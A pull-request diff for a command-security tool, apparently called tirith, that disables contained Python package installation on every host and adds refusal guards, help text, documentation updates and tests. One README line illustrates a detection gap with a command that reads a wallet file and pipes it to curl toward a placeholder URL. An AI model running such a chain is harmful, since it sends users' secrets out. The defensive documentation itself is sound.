### PR TITLE
Disable unqualified private package input execution

### DIFF
--- a/README.md
+++ b/README.md
@@ -185,8 +185,9 @@ cover:
 
 - **General runtime sandboxing:** ordinary shell hooks and `tirith check` warn
   or block; they do not isolate a command after launch. The explicit
-  `capsule run --preset untrusted-project` and enforcing `pkg install` paths
-  provide fail-closed containment only on supported x86_64 Linux hosts.
+  `capsule run --preset untrusted-project` path provides fail-closed containment
+  only on supported x86_64 Linux hosts. Contained `pkg install` execution is
+  currently disabled on every host.
 - **Post-execution network monitoring:** what a process does on the network after
   launch is out of scope.
 - **General malware / payload detection:** tirith is not an antivirus and does
@@ -286,11 +287,12 @@ contains, and attests.
   `effects_denied_for_untrusted_sources`, denies the named effect on every call
   at every owned boundary, including commands you typed yourself, because no
   source at those boundaries is ever treated as trusted.
-- **Containment is x86_64 Linux:** `tirith capsule run --preset
-  untrusted-project` and enforcing `tirith pkg install` are enforceable only on
-  x86_64 Linux with a usable Landlock ABI. Every other host refuses before
-  anything is copied or spawned, with no degraded fallback. Domain
-  allow-listing is not offered by any backend.
+- **Project containment is x86_64 Linux:** `tirith capsule run --preset
+  untrusted-project` requires x86_64 Linux with a usable Landlock ABI. Every
+  other host refuses before anything is copied or spawned, with no degraded
+  fallback. Contained `tirith pkg install` execution is disabled on every host
+  pending private-input qualification. Domain allow-listing is not offered by
+  any backend.
 - **Nested-shell exfiltration gap:** a sensitive read inside a nested shell body
   whose sink is outside it, such as `bash -c "cat <wallet>" | curl -d @- <url>`,
   is not correlated today. The same chain wholly inside or wholly outside the
@@ -393,7 +395,7 @@ This helps catch known-malicious packages, confirmed typosquats, slopsquatted pa
 ### Python artifact inspection and enforcing installs
 
 Package-name risk is only one layer. Tirith can inspect the exact Python bytes
-you already have and, on supported hosts, enforce a hash-pinned install plan:
+you already have and verify an existing installed environment:
 
 ```bash
 # Local evidence: never downloads an artifact
@@ -401,11 +403,8 @@ tirith package inspect --artifact dist/example-1.0-py3-none-any.whl
 tirith package inspect --artifact-set ./downloaded-wheels
 tirith package inspect --installed ./.venv
 
-# Enforcing pip workflow: x86_64 Linux only
-tirith pkg trust-tool /absolute/path/to/static-uv
-tirith pkg approve pip requests==2.31.0 --target .tirith-pkg
-tirith pkg install pip requests==2.31.0 --target .tirith-pkg
-tirith pkg verify-env --target .tirith-pkg requests
+# Verify an existing environment without installing
+tirith pkg verify-env --target .venv requests
 ```
 
 Inspection covers wheel structure and identity, RECORD integrity and file
@@ -414,13 +413,15 @@ edges, and loader/payload splits across distributions. `pkg graph`, `pkg diff`,
 `pkg attest`, and `pkg receipt` expose the corresponding provenance and receipt
 evidence.
 
-The enforcing path supports **pip on x86_64 Linux only** and requires the
-documented native authority, a newly dedicated target directory, and an
-enrolled fully static native `uv`. Every unsupported platform fails closed
-before pip starts; it never falls back to an ordinary install. npm and Cargo
-remain non-enforcing evidence surfaces. See the
-[0.4.0 release notes](docs/release-notes-0.4.0.md) and
-[command reference](docs/commands.md).
+Contained **`tirith pkg install` execution is currently disabled on every host**.
+It refuses with `private_input_execution_unqualified` before resolver execution,
+network access, quarantine writes, checkpoint creation, or package launch.
+The private named-input backend must establish unchanged package inputs for the
+complete target lifetime against another process owned by the same user before
+execution can be enabled. `--yes`, `--allow-degraded`, sudo, administrator access,
+and existing approvals cannot bypass this refusal. npm and Cargo remain
+non-enforcing evidence surfaces. See the [capsule capability limits](docs/capsule.md)
+and [command reference](docs/commands.md).
 
 **Attack families tirith is built for** (illustrative, not a caught-by-current-code claim):
 
@@ -957,7 +958,9 @@ The everyday commands:
 | `tirith package risk <eco> <name>` | Score a package's supply-chain risk |
 | `tirith ecosystem scan [path]` | Score every declared dependency in a project |
 | `tirith package inspect --artifact <wheel>` | Inspect exact Python artifact bytes, startup hooks, native code, RECORD integrity, and cross-wheel execution chains |
-| `tirith pkg {approve,install,verify-env}` | Approve, hash-pin, contain, install, and verify Python packages on supported x86_64 Linux hosts |
+| `tirith pkg approve` | Create a non-installing Python package approval under its native authority and platform requirements |
+| `tirith pkg install` | Currently disabled on every host: refuses with `private_input_execution_unqualified` before resolver or package execution |
+| `tirith pkg verify-env` | Verify an existing Python environment without installing packages |
 | `tirith mcp {lock,verify}` | Pin and gate a repo's MCP servers |
 | `tirith gateway run` | Proxy an upstream MCP server and enforce configured request/output boundaries |
 | `tirith daemon start` | Background daemon for faster checks (Unix) |

--- a/crates/tirith/src/cli/capsule.rs
+++ b/crates/tirith/src/cli/capsule.rs
@@ -2315,7 +2315,53 @@ fn normalize_bound_target_policy(
     Ok((filesystem, requested_target_policy))
 }
 
-/// Production `pkg install` seam: execute a content-bound program against immutable
+/// Qualification refusal for the package-only private named-input backend.
+/// Generic capsule coverage does not establish this additional input-lifetime
+/// guarantee. There is deliberately no environment, flag, or test override.
+#[derive(Clone, Copy, Debug, PartialEq, Eq)]
+pub(crate) enum PrivateInputExecutionRefusal {
+    InputLifetimeUnqualified,
+}
+
+impl std::fmt::Display for PrivateInputExecutionRefusal {
+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        match self {
+            Self::InputLifetimeUnqualified => f.write_str(
+                "private_input_execution_unqualified: contained package execution is disabled; \
+                 the private-input backend has not been qualified to keep package inputs \
+                 unchanged throughout execution against another process owned by the same user. \
+                 Sudo or administrator access does not qualify this backend. Package inspection \
+                 and ordinary command protection remain available.",
+            ),
+        }
+    }
+}
+
+impl std::error::Error for PrivateInputExecutionRefusal {}
+
+impl PrivateInputExecutionRefusal {
+    pub(crate) fn into_capsule_refusal(self, spec: &CapsuleSpec) -> CapsuleRefused {
+        CapsuleRefused {
+            backend_id: select_backend(spec).backend_id,
+            reason: self.to_string(),
+        }
+    }
+}
+
+/// A single production decision shared by the public install command, its
+/// side-effect seam, and both sides of the hidden private-input launcher.
+/// Re-enabling requires a reviewed implementation and native qualification of
+/// immutable named inputs for the complete target lifetime.
+pub(crate) fn require_private_input_execution_qualification(
+) -> Result<(), PrivateInputExecutionRefusal> {
+    Err(PrivateInputExecutionRefusal::InputLifetimeUnqualified)
+}
+
+/// Disabled production `pkg install` seam. Qualification refuses before target
+/// binding, input staging, or hidden-launcher creation. The retained implementation
+/// below is not an enabled capability.
+///
+/// Intended contract: execute a content-bound program against immutable
 /// named inputs and one held writable target directory. x86_64 Linux constructs a
 /// private user+mount namespace in the hidden launcher, exposes only sealed
 /// bind-mounted input names, installs the target Landlock WRITE rule from the
@@ -2332,6 +2378,8 @@ pub fn run_to_completion_bound_inputs(
     extra_env: &[(String, String)],
     output_presentation: BoundOutputPresentation,
 ) -> Result<CapsuleExecutionOutcome, CapsuleExecutionError> {
+    require_private_input_execution_qualification()
+        .map_err(|error| error.into_capsule_refusal(spec))?;
     #[cfg(not(target_os = "linux"))]
     {
         let _ = (

--- a/crates/tirith/src/cli/capsule_child.rs
+++ b/crates/tirith/src/cli/capsule_child.rs
@@ -130,6 +130,23 @@ pub struct ParsedArgs {
     pub program_args: Vec<OsString>,
 }
 
+impl ParsedArgs {
+    fn require_private_input_execution_qualification(
+        &self,
+    ) -> Result<(), crate::cli::capsule::PrivateInputExecutionRefusal> {
+        if self.staging_root.is_some()
+            || self.staging_fd.is_some()
+            || !self.inputs.is_empty()
+            || self.target_dir_fd.is_some()
+            || self.target_dir_root.is_some()
+            || self.target_dir_visible_root.is_some()
+        {
+            crate::cli::capsule::require_private_input_execution_qualification()?;
+        }
+        Ok(())
+    }
+}
+
 /// Parse `tirith __capsule-child <spec-json> [internal options] -- <prog>
 /// <arg>...` from the full process argv. Internal options are closed and may
 /// appear at most once: `--target-argv0 <value>`, `--target-fd <number>`,
@@ -490,6 +507,13 @@ pub fn run_on_main_thread(args: &[OsString]) -> ! {
             std::process::exit(2);
         }
     };
+    // The hidden CLI is callable independently of the parent launch helper.
+    // Check before dispatch on every OS: accepting private-input operands must
+    // never silently downgrade them to an ordinary pathname-based launch.
+    if let Err(error) = parsed.require_private_input_execution_qualification() {
+        eprintln!("tirith __capsule-child: {error}");
+        std::process::exit(2);
+    }
     #[cfg(target_os = "linux")]
     {
         linux_launch(&parsed)
@@ -957,6 +981,10 @@ fn enter_private_input_namespace(
 ) -> Result<(), String> {
     use std::os::fd::{AsRawFd as _, FromRawFd as _};
 
+    // Recheck at the namespace boundary so a later internal refactor cannot
+    // bypass the qualification decision made by hidden-command dispatch.
+    crate::cli::capsule::require_private_input_execution_qualification()
+        .map_err(|error| error.to_string())?;
     let host_uid = unsafe { libc::geteuid() };
     let host_gid = unsafe { libc::getegid() };
     if unsafe { libc::unshare(libc::CLONE_NEWUSER) } != 0 {
@@ -2542,6 +2570,7 @@ mod tests {
             "pip",
         ]);
         let p = parse_args(&a).expect("parse");
+        assert!(p.require_private_input_execution_qualification().is_ok());
         assert_eq!(p.spec_json, "{\"network\":{\"mode\":\"deny_all\"}}");
         assert_eq!(p.program, "/usr/bin/python3");
         assert_eq!(
@@ -2554,6 +2583,7 @@ mod tests {
     fn parse_args_program_with_no_args() {
         let a = argv(&["tirith", "__capsule-child", "{}", "--", "ls"]);
         let p = parse_args(&a).expect("parse");
+        assert!(p.require_private_input_execution_qualification().is_ok());
         assert_eq!(p.program, "ls");
         assert!(p.program_args.is_empty());
     }
@@ -2624,6 +2654,9 @@ mod tests {
             &[&base[..], &["--", "/bin/sh", "-c", "npm test"]].concat(),
         ))
         .expect("parse a bound work directory");
+        assert!(parsed
+            .require_private_input_execution_qualification()
+            .is_ok());
         assert_eq!(parsed.work_fd, Some(57));
         assert_eq!(
             parsed.work_root.as_deref(),
@@ -2710,6 +2743,10 @@ mod tests {
             "pip",
         ]);
         let parsed = parse_args(&a).expect("parse sealed-input capabilities");
+        assert_eq!(
+            parsed.require_private_input_execution_qualification(),
+            Err(crate::cli::capsule::PrivateInputExecutionRefusal::InputLifetimeUnqualified)
+        );
         assert_eq!(parsed.coverage_status_fd, Some(61));
         assert_eq!(parsed.staging_fd, Some(57));
         assert_eq!(
@@ -2732,6 +2769,14 @@ mod tests {
             parsed.target_dir_visible_root.as_deref(),
             Some(OsStr::new("/tmp/pending-venv"))
         );
+    }
+
+    #[cfg(target_os = "linux")]
+    #[test]
+    fn private_input_namespace_refuses_before_descriptor_or_namespace_operations() {
+        let error = enter_private_input_namespace(-1, &[])
+            .expect_err("unqualified backend must refuse before opening descriptors");
+        assert!(error.starts_with("private_input_execution_unqualified:"));
     }
 
     #[test]

--- a/crates/tirith/src/cli/pkg.rs
+++ b/crates/tirith/src/cli/pkg.rs
@@ -1,7 +1,11 @@
 //! `tirith pkg install | verify-env | approve | receipt`, the package-firewall
 //! CLI surface (PR D7).
 //!
-//! This is the operator-facing command that drives the D1-D6 machinery end to end:
+//! Contained `pkg install` execution is currently disabled by the shared
+//! private-input qualification guard, before resolver or package side effects.
+//! The remaining commands retain their existing authority and platform gates.
+//!
+//! The retained D1-D6 implementation provides:
 //!
 //! * **`pkg approve`** resolves a Python requirement set into the D1 quarantine (D2),
 //!   firewalls + re-binds it (D3/D4), and prints the [`InstallPlanDigest`] the
@@ -10,11 +14,10 @@
 //!   interpreter, target env, platform tags, install-command semantics, redacted
 //!   policy hash, threat-DB sequence, capsule backend, required coverage, expiry);
 //!   the sorted SHA-set is a display label only.
-//! * **`pkg install`** repeats the resolve + re-bind, re-derives the digest of the
-//!   plan it is ABOUT to run, requires a matching un-expired approval record (or an
-//!   explicit `--yes` for the unattended path), runs the contained install (D4,
-//!   fail-closed under degraded coverage), verifies the installed RECORD (D5), and
-//!   records a tamper-evident, Ed25519-mandatory receipt (D6).
+//! * **`pkg install`** currently refuses before this pipeline. The retained
+//!   implementation resolves and re-binds an approved plan, installs through the
+//!   capsule (D4), verifies RECORD (D5), and requires a signed receipt (D6).
+//!   None of those stages can bypass the private-input qualification refusal.
 //! * **`pkg verify-env`** runs the D5 post-install RECORD verification over an
 //!   already-installed environment, without installing anything.
 //! * **`pkg receipt`** lists and shows the D6 [`ArtifactScanReceipt`]s.
@@ -23,9 +26,9 @@
 //!
 //! `tirith install` (in [`crate::cli::install`]) is the ANALYSIS path: it inspects a
 //! package-manager command and optionally runs the real, UNcontained install.
-//! `tirith pkg install` is the ENFORCING path: it installs ONLY the inspected,
-//! hash-pinned bytes, inside the capsule, and refuses on degraded coverage. The two
-//! stay separate commands. This module reuses `tirith install`'s
+//! `tirith pkg install` retains the ENFORCING path but currently refuses on every
+//! host because the private-input backend is unqualified. The two stay separate
+//! commands. This module reuses `tirith install`'s
 //! `MISPLACED_TIRITH_FLAGS` footgun guard (a tirith-owned flag placed after the
 //! trailing args would silently not affect tirith).
 //!
@@ -1185,10 +1188,6 @@ fn run_install(
     if let Some(failure) = precheck(ecosystem, requirements) {
         return report_pkg_precheck_failure("install", &failure, json);
     }
-    let cwd = std::env::current_dir()
-        .ok()
-        .map(|p| p.display().to_string());
-    let policy = discover_pkg_enforcement_policy(cwd.as_deref());
     let request = match validated_resolver_request(requirements, index_url, artifact_origin) {
         Ok(request) => request,
         Err(error) => {
@@ -1202,6 +1201,23 @@ fn run_install(
             );
         }
     };
+    // Validate syntax first, then refuse an unqualified execution backend before
+    // policy discovery, target retention, resolver/network work, quarantine,
+    // approval consumption, checkpoint creation, or receipt publication.
+    if let Err(error) = capsule::require_private_input_execution_qualification() {
+        return report_install_failure(
+            "refused_before_exec",
+            &error.to_string(),
+            false,
+            false,
+            json,
+            1,
+        );
+    }
+    let cwd = std::env::current_dir()
+        .ok()
+        .map(|p| p.display().to_string());
+    let policy = discover_pkg_enforcement_policy(cwd.as_deref());
     let target_binding = match bind_install_target(target) {
         Ok(binding) => binding,
         Err(error) => {

--- a/crates/tirith/src/cli/pkg_install.rs
+++ b/crates/tirith/src/cli/pkg_install.rs
@@ -1,5 +1,8 @@
 //! Contained install-from-digest for the package firewall (PR D4, CLI half).
 //!
+//! Execution is currently disabled before install preparation by the shared
+//! private-input qualification guard. The implementation below remains gated.
+//!
 //! `tirith-core`'s [`tirith_core::artifact::install`] does the pure planning: it
 //! re-binds the approval against the live threat DB (re-hashing every quarantine
 //! blob), and produces a [`tirith_core::artifact::install::DigestInstallPlan`]
@@ -36,10 +39,9 @@
 //! enforcing install through the uncontained runner.
 //!
 //! [`run_contained_install`] is the production side-effect seam called by
-//! `tirith pkg install` on x86_64 Linux. Unsupported platforms and architectures
-//! refuse before package execution. Platform-gated recovery helpers remain compiled
-//! only on their owning targets; the module-level dead-code allowance covers those
-//! narrow compatibility seams without weakening the launch path.
+//! `tirith pkg install`. Its qualification guard currently refuses every host
+//! before install preparation or package execution. The retained implementation
+//! is not an enabled capability.
 #![allow(dead_code)]
 
 use std::ffi::{OsStr, OsString};
@@ -1514,6 +1516,15 @@ pub fn run_contained_install(
     suppress_child_output: bool,
     task_denied_effects: &std::collections::BTreeSet<tirith_core::effects::CommandEffectKind>,
 ) -> Result<AuthorizedContainedInstallOutcome, ContainedInstallError> {
+    // Refuse an already-authorized internal call before approved.txt publication
+    // or executor preparation.
+    capsule::require_private_input_execution_qualification().map_err(|error| {
+        let refused = error.into_capsule_refusal(&plan.spec);
+        ContainedInstallError::CapsuleRefused {
+            backend_id: refused.backend_id,
+            reason: refused.reason,
+        }
+    })?;
     let AuthorizedInstallLaunch {
         target_install_path,
         target_handle,

--- a/crates/tirith/src/main.rs
+++ b/crates/tirith/src/main.rs
@@ -439,9 +439,8 @@ after the analysis and your go-ahead.
 
 This is pre-execution install-RISK ANALYSIS plus a recorded transaction. Real
 package-manager installs (`npm`, `pip`, `cargo`, and others) are not sandboxed;
-on x86_64 Linux, use `tirith pkg install` for the enforcing package firewall.
-Other platforms and architectures refuse that enforcing execution. The `url`
-form is different: reviewed scripts execute contained by default and fail closed
+contained package installation (`tirith pkg install`) is currently disabled
+pending qualification of immutable named inputs. The `url` form is different: reviewed scripts execute contained by default and fail closed
 when the Linux capsule cannot provide the required coverage.
 
 The package(s) are scored with the deterministic `tirith package risk`
@@ -525,9 +524,8 @@ Examples:
         sha256: Option<String>,
     },
 
-    /// Package firewall: resolve and inspect Python packages; on x86_64 Linux,
-    /// install ONLY the verified bytes inside a containment capsule, with a
-    /// tamper-evident receipt.
+    /// Inspect Python packages and verify installed environments.
+    /// Contained package installation is currently disabled.
     #[command(after_help = "\
 Examples:
   tirith pkg approve pip requests==2.31.0 --target .tirith-pkg
@@ -536,11 +534,16 @@ Examples:
   tirith pkg verify-env --target .venv requests flask
   tirith pkg receipt list
 
-`tirith pkg approve` native approval issuance and `tirith pkg install` enforcing
-execution are supported only on x86_64 Linux. Other platforms and architectures
-fail closed instead of issuing an approval that cannot be redeemed. `pkg
-verify-env` remains a read-only verifier, and `tirith install` remains the
-portable analysis path.")]
+`tirith pkg install` is disabled on every host and refuses with
+private_input_execution_unqualified before resolver, quarantine, checkpoint,
+or package execution. --yes, --allow-degraded, sudo, and administrator access
+do not enable it. Immutable named inputs must be qualified for the complete
+target lifetime before contained package execution can be enabled.
+
+`tirith pkg approve` remains subject to its separate native authority and
+x86_64 Linux requirements; an approval cannot bypass the execution refusal.
+`pkg verify-env` remains a read-only verifier, and `tirith package inspect`
+remains available for local artifact inspection.")]
     Pkg {
         #[command(subcommand)]
         action: PkgAction,
@@ -5884,18 +5887,22 @@ platforms fail closed before publishing an approval record.")]
         #[arg(long, hide = true, conflicts_with = "format")]
         json: bool,
     },
-    /// Resolve + inspect + install ONLY the verified, hash-pinned bytes, inside the
-    /// containment capsule, recording a tamper-evident receipt. Enforcing execution
-    /// is x86_64 Linux-only; every other platform or architecture fails closed
-    /// before pip starts.
+    /// Contained package installation (currently disabled on every host).
+    /// Refuses before resolver, quarantine, checkpoint, or package execution.
     #[command(after_help = "\
 Examples:
   tirith pkg install pip requests==2.31.0 --target .tirith-pkg
   tirith pkg install pip flask --target .venv --yes
 
-Execution is supported only on x86_64 Linux. Unsupported platforms and
-architectures refuse before pip starts; they never fall back to an uncontained
-install.")]
+Execution is disabled on every host. These examples retain the accepted syntax
+but refuse with private_input_execution_unqualified before resolver execution,
+network access, quarantine writes, checkpoint creation, or package launch.
+--yes, --allow-degraded, sudo, and administrator access do not enable it.
+
+The private named-input backend has not been qualified to keep package inputs
+unchanged for the complete target lifetime against another process owned by
+the same user. `tirith package inspect` and `tirith pkg verify-env` remain
+available.")]
     Install {
         /// The ecosystem (only `pip` is enforced).
         #[arg(value_enum)]
@@ -5912,8 +5919,7 @@ install.")]
         /// egress only and is never treated as a package index.
         #[arg(long = "artifact-origin")]
         artifact_origin: Vec<String>,
-        /// Install without a prior `tirith pkg approve` (unattended). The receipt
-        /// still attests the install honestly.
+        /// Retained unattended confirmation flag; cannot enable the disabled backend.
         #[arg(long)]
         yes: bool,
         /// Acknowledge degraded containment (still routes through the fail-closed

--- a/crates/tirith/tests/cli_integration.rs
+++ b/crates/tirith/tests/cli_integration.rs
@@ -22002,10 +22002,10 @@ fn pkg_approve_and_install_reject_same_uid_path_resolver_before_execution() {
                 stderr.contains("package approvals are redeemable only on x86_64 Linux"),
                 "pkg approve must report its native capability boundary: {stderr}"
             );
-        } else if action == "install" && !cfg!(target_os = "linux") {
+        } else if action == "install" {
             assert!(
-                stderr.contains("enforcing package target binding is supported only on Linux"),
-                "pkg install must report its target capability boundary: {stderr}"
+                stderr.contains("private_input_execution_unqualified:"),
+                "pkg install must refuse before resolver discovery: {stderr}"
             );
         } else {
             assert!(
@@ -22021,20 +22021,14 @@ fn pkg_approve_and_install_reject_same_uid_path_resolver_before_execution() {
     );
 }
 
-/// `tirith pkg install pip <req>` on a host whose resolver toolchain is ABSENT must
-/// fail closed: a non-zero exit and a refusal message, never a clean success or a
-/// silent uncontained install. This is the real enforcing-surface negative path —
-/// the resolver-discovery gate refuses before any download/spawn. (The deeper
-/// `InterpreterNotFound` leg, reached only AFTER a successful resolve, is unit-
-/// tested in `cli/pkg_install.rs::install_fails_closed_when_capsule_is_degraded`;
-/// it cannot be driven end to end here without a real `uv`.)
+/// An absent resolver cannot change the package backend's qualification refusal.
+/// This reaches the real public command without any tool or network dependency.
 #[test]
 fn pkg_install_pip_fails_closed_when_toolchain_absent() {
     let home = tempfile::tempdir().expect("tempdir");
     let target = home.path().join("env");
     let out = tirith()
-        // No resolver tools on PATH -> discover() returns ToolNotFound, the install
-        // refuses. PATH is the only thing steering tool discovery here.
+        // The qualification refusal must precede even resolver discovery.
         .env("PATH", empty_path_dir(home.path()))
         // Isolate the data dir on every OS so no approval/receipt state leaks in.
         .env("XDG_DATA_HOME", home.path())
@@ -22058,18 +22052,11 @@ fn pkg_install_pip_fails_closed_when_toolchain_absent() {
         String::from_utf8_lossy(&out.stderr)
     );
     let stderr = String::from_utf8_lossy(&out.stderr);
-    if cfg!(target_os = "linux") {
-        assert!(
-            stderr.contains("tirith pkg install:") && stderr.contains("resolve failed"),
-            "the refusal must name the failed resolve, not silently proceed: {stderr}"
-        );
-    } else {
-        assert!(
-            stderr.contains("target_binding")
-                && stderr.contains("enforcing package target binding is supported only on Linux"),
-            "the refusal must name the unavailable native target binding: {stderr}"
-        );
-    }
+    assert!(
+        stderr.contains("tirith pkg install:")
+            && stderr.contains("private_input_execution_unqualified:"),
+        "the refusal must name the unqualified private-input backend: {stderr}"
+    );
     // The enforcing surface must NOT have installed into the target environment.
     assert!(
         !target.exists()
@@ -22151,20 +22138,136 @@ fn pkg_install_pip_json_still_fails_closed_when_toolchain_absent() {
         )
     });
     assert_eq!(json["success"], false);
-    assert_eq!(
-        json["error_phase"],
-        if cfg!(target_os = "linux") {
-            "plan_preparation"
-        } else {
-            "target_binding"
-        }
-    );
+    assert_eq!(json["error_phase"], "refused_before_exec");
+    assert!(json["reason"]
+        .as_str()
+        .unwrap()
+        .starts_with("private_input_execution_unqualified:"));
     assert_eq!(json["target_executed"], false);
     assert_eq!(json["target_published"], false);
     assert!(
         !target.exists(),
         "an early structured refusal must not create the dedicated target"
     );
+}
+
+/// Existing confirmation/degradation flags cannot qualify a disabled execution
+/// backend. Refusal must precede target binding and all package state creation.
+#[test]
+fn pkg_install_private_input_qualification_refuses_before_package_side_effects() {
+    for flags in [
+        Vec::<&str>::new(),
+        vec!["--yes"],
+        vec!["--allow-degraded"],
+        vec!["--yes", "--allow-degraded"],
+    ] {
+        for json in [false, true] {
+            let fixture = tempfile::tempdir().unwrap();
+            let data = fixture.path().join("data-must-not-exist");
+            let config = fixture.path().join("config-must-not-exist");
+            let target = fixture.path().join("missing-parent").join("target");
+            let mut command = tirith();
+            command
+                .current_dir(fixture.path())
+                .env("HOME", fixture.path())
+                .env("USERPROFILE", fixture.path())
+                .env("XDG_CONFIG_HOME", &config)
+                .env("XDG_DATA_HOME", &data)
+                .env(
+                    "XDG_STATE_HOME",
+                    fixture.path().join("state-must-not-exist"),
+                )
+                .env(
+                    "XDG_CACHE_HOME",
+                    fixture.path().join("cache-must-not-exist"),
+                )
+                .env(
+                    "XDG_RUNTIME_DIR",
+                    fixture.path().join("runtime-must-not-exist"),
+                )
+                .env("APPDATA", &data)
+                .env(
+                    "LOCALAPPDATA",
+                    fixture.path().join("local-data-must-not-exist"),
+                )
+                .env("TIRITH_LOG", "0")
+                .args(["pkg", "install", "pip", "examplepkg==1.0.0", "--target"])
+                .arg(&target)
+                .args(&flags);
+            if json {
+                command.arg("--json");
+            }
+            let output = command.output().expect("run public package refusal");
+            assert_eq!(output.status.code(), Some(1), "flags={flags:?}");
+            let reason = if json {
+                let value: serde_json::Value = serde_json::from_slice(&output.stdout)
+                    .expect("one complete JSON refusal document");
+                assert_eq!(value["success"], false);
+                assert_eq!(value["error_phase"], "refused_before_exec");
+                assert_eq!(value["target_executed"], false);
+                assert_eq!(value["target_published"], false);
+                value["reason"].as_str().unwrap().to_owned()
+            } else {
+                assert!(output.stdout.is_empty());
+                String::from_utf8(output.stderr).expect("static refusal is UTF-8")
+            };
+            assert!(reason.contains("private_input_execution_unqualified:"));
+            assert!(reason.contains("Sudo or administrator access does not qualify"));
+            assert!(!data.exists(), "refusal must not create package state");
+            assert!(!config.exists(), "refusal must not create configuration");
+            assert!(!target.parent().unwrap().exists());
+            assert!(fs::read_dir(fixture.path()).unwrap().next().is_none());
+        }
+    }
+}
+
+/// A complete private-input argv and valid spec must hit qualification before
+/// platform setup or descriptor validation. The target is a harmless shell that
+/// would create a marker if reached; no package or namespace attack is attempted.
+#[cfg(unix)]
+#[test]
+fn hidden_capsule_private_inputs_refuse_before_target_execution() {
+    let fixture = tempfile::tempdir().unwrap();
+    let marker = fixture.path().join("target-executed");
+    let spec = tirith_core::capsule::CapsuleSpec::locked_down();
+    let spec_json = serde_json::to_string(&spec).unwrap();
+    let output = tirith()
+        .current_dir(fixture.path())
+        .args(["__capsule-child", &spec_json])
+        .args([
+            "--staging-root",
+            "/must-not-open-stage",
+            "--staging-fd",
+            "57",
+            "--input-fd",
+            "58",
+            "--input-name",
+            "approved.txt",
+            "--target-dir-fd",
+            "59",
+            "--target-dir-root",
+            "/must-not-open-target",
+            "--target-dir-visible-root",
+            "/must-not-open-pending-target",
+            "--",
+            "/bin/sh",
+            "-c",
+            r#"printf launched > "$1""#,
+            "private-input-refusal-test",
+        ])
+        .arg(&marker)
+        .output()
+        .expect("run hidden private-input refusal");
+    assert_eq!(output.status.code(), Some(2));
+    let stderr = String::from_utf8(output.stderr).unwrap();
+    assert!(
+        stderr.contains("private_input_execution_unqualified:"),
+        "{stderr}"
+    );
+    assert!(!stderr.contains("invalid capsule spec"));
+    assert!(output.stdout.is_empty());
+    assert!(!marker.exists(), "refused target must never execute");
+    assert!(fs::read_dir(fixture.path()).unwrap().next().is_none());
 }
 
 /// `tirith pkg install` only enforces `pip` in v1; a non-pip ecosystem must be a

--- a/crates/tirith/tests/help_snapshots.rs
+++ b/crates/tirith/tests/help_snapshots.rs
@@ -791,3 +791,18 @@ fn help_mcp_diff_documents_exit_codes() {
         "mcp diff --help must document exit 2 on usage error, got:\n{stdout}"
     );
 }
+
+#[test]
+fn package_install_help_states_the_disabled_execution_scope() {
+    for args in [vec!["pkg", "--help"], vec!["pkg", "install", "--help"]] {
+        let out = tirith().args(&args).output().expect("read package help");
+        assert!(out.status.success());
+        let text = String::from_utf8_lossy(&out.stdout);
+        let text = text.split_whitespace().collect::<Vec<_>>().join(" ");
+        assert!(text.contains("disabled on every host"), "{args:?}: {text}");
+        assert!(text.contains("private_input_execution_unqualified"));
+        assert!(text
+            .contains("--yes, --allow-degraded, sudo, and administrator access do not enable it"));
+        assert!(text.contains("verify-env"));
+    }
+}

--- a/docs/capability-manifest.toml
+++ b/docs/capability-manifest.toml
@@ -620,14 +620,14 @@ coverage = "Clipboard with secret-shape gating and browser source attribution; i
 policy_complete = true
 
 # ---------------------------------------------------------------------------
-# Package firewall (Python; install enforcement is x86_64 Linux-only)
+# Package firewall (Python; contained install execution is disabled)
 # ---------------------------------------------------------------------------
 
 [[command]]
 name = "pkg install"
 group = "Package firewall"
-inspected = "full"
-coverage = "Resolves with hashes, quarantines the exact wheel bytes, and inspects them. Enforcing Python installation is x86_64 Linux-only and uses only the verified bytes inside a containment capsule with a tamper-evident receipt; every other platform or architecture fails closed before pip starts."
+inspected = "none"
+coverage = "Contained package execution is disabled on every host pending qualification of immutable named inputs for the complete target lifetime. Refuses before resolver execution, network access, quarantine writes, checkpoint creation, or package launch. Flags and elevation do not enable the backend; package inspect and pkg verify-env remain available."
 policy_complete = true
 
 [[command]]

--- a/docs/capability-matrix.md
+++ b/docs/capability-matrix.md
@@ -134,7 +134,7 @@ Inspected:
 
 | Command | Inspected | Coverage | Policy-complete |
 |---------|-----------|----------|-----------------|
-| `tirith pkg install` | Full | Resolves with hashes, quarantines the exact wheel bytes, and inspects them. Enforcing Python installation is x86_64 Linux-only and uses only the verified bytes inside a containment capsule with a tamper-evident receipt; every other platform or architecture fails closed before pip starts. | Yes |
+| `tirith pkg install` | None | Contained package execution is disabled on every host pending qualification of immutable named inputs for the complete target lifetime. Refuses before resolver execution, network access, quarantine writes, checkpoint creation, or package launch. Flags and elevation do not enable the backend; package inspect and pkg verify-env remain available. | Yes |
 | `tirith pkg verify-env` | Full | Verifies an installed environment's files against their RECORD and the threat DB. Python-only. | Yes |
 | `tirith pkg approve` | Full | Binds an approval to an InstallPlanDigest over the inspected artifact hashes, packages, target env, policy projection, and DB sequence. | Yes |
 | `tirith pkg graph` | Full | Renders the execution/ownership provenance graph from inspected artifact execution edges and the ownership map. | Yes |

--- a/docs/capsule.md
+++ b/docs/capsule.md
@@ -16,7 +16,7 @@ tirith itself launches, never to arbitrary shell commands.
 | `tirith run` (live execution is Linux-only; `--no-exec` is inspection-only on Unix) | default for every live run (`--capsule` remains accepted) | deny-all | fail closed |
 | `tirith temp-run` | `--capsule` | deny-all | best-effort (runs uncontained if no backend, and says so) |
 | `tirith gateway run` | `--capsule` (or the `secure` gateway profile) | deny-all | fail closed |
-| `tirith pkg install` (enforcing execution is x86_64 Linux-only) | always | deny-all | fail closed; every other platform or architecture refuses before pip starts |
+| `tirith pkg install` (execution currently disabled on every host) | always | deny-all | refuses before resolver, quarantine, checkpoint, or package execution |
 | `tirith capsule run` (enforceable on x86_64 Linux only) | `--preset untrusted-project` | deny-all (no domain allow-listing is offered) | fail closed; every other platform or architecture refuses before anything is copied or spawned |
 
 "Fail closed" means: if this host's backend cannot enforce the containment the
@@ -25,9 +25,22 @@ uncontained. The `temp-run` surface is the only best-effort one, because it is
 explicitly a filesystem-impact preview rather than a security boundary; with
 `--capsule` it hardens the run where it can and reports honestly when it cannot.
 
-The `tirith pkg install` platform limit applies only to the enforcing execution
-step. `tirith pkg approve` remains a non-installing approval flow, and
-`tirith pkg verify-env` verifies an existing environment without launching pip.
+`tirith pkg install pip` currently refuses with `private_input_execution_unqualified`
